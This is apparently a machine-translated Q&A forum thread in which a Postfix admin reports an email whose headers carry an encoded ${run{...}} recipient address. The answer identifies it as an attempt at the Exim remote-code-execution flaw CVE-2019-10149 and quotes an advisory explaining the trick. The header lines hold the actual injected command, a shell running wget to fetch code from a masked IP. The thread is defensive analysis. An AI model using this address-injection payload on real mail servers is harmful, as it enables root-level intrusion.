不寻常的邮件标头显示 MTA 攻击的证据。我被pwn了吗?

信息安全 攻击 后缀 远程代码执行
2021-08-12 08:20:30

今天我在我的收件箱里发现了一封非常不寻常的电子邮件,没有主题、发件人或内容。我的 Android 版 Gmail 客户端报告邮件是由 发送的me,这在我的脑海中触发了核警报。

我担心有人猜出了我的强密码,并且这封邮件来自我的邮件传输代理 (MTA),所以我急忙查看电子邮件本身和邮件日志。那没有发生。

我发现在我看来像是试图利用fail2ban我从未听说过的邮件服务器漏洞。

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <000701d52665$301b5e30$90521a90$@Domain>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==

分析:发件人试图更改邮件目的地以启动以下(编码)命令并利用潜在的远程代码执行漏洞,其中Xes序列表示IP地址

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#

尽管sht-ct这是我不熟悉的东西(或从手动 url 解码错误翻译),但我从假设所有攻击者都知道我在我的服务器上使用 Postfix 作为 MTA 开始。

问题

我想确认这是否是我怀疑的真实尝试,即使用精心制作的电子邮件进行远程命令执行攻击。其次,我强烈要求pwned以除了仔细查看top和之外的方式评估我是否曾经做过crontab我需要了解此攻击是否会影响我的 MTA 或试图利用已过时且修复良好的漏洞。

我只是匆忙更新 Postfix,但不知道该漏洞(如果它影响 Postfix),我几乎没有任何线索。

我急于在公共论坛上询问有关 MTA 的安全问题的原因是,根据我的观点/经验,与其他类型的服务相比,被黑客入侵的邮件服务器箱可以在极短的时间内造成大量损害,这需要迅速采取行动。

1个回答

这是利用 EXIM 邮件服务器中当前的远程代码执行问题的尝试,即CVE-2019-10149请参阅The Return of the WIZard: RCE in Exim了解详细信息以及您遇到的漏洞利用类型。如果您不使用 EXIM 或运行固定版本,您是安全的。

从链接的文章(强调添加):

本地攻击者(以及某些非默认配置下的远程攻击者)可立即利用此漏洞要在默认配置中远程利用此漏洞,攻击者必须保持与易受攻击服务器的连接打开 7 天(每隔几分钟传输一个字节)。但是由于Exim的代码极其复杂,我们不能保证这种利用方式是唯一的;可能存在更快的方法。

[...]

因为expand_string() 可以识别“${run{ }}”扩展项,并且因为new->address 是正在投递的邮件的收件人,本地攻击者可以简单地将邮件发送到“${run{.. .}}@localhost"(其中 "localhost" 是 Exim 的 local_domains 之一)并以 root 身份执行任意命令(默认情况下,deliver_drop_privilege 为 false):

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
其它你可能感兴趣的问题
上一篇如何从我的 Windows 配置文件中清除缓存的凭据? 下一篇为什么使用 SMTP 服务器的 Gmail(添加帐户)推荐 SSL 而不是 TLS?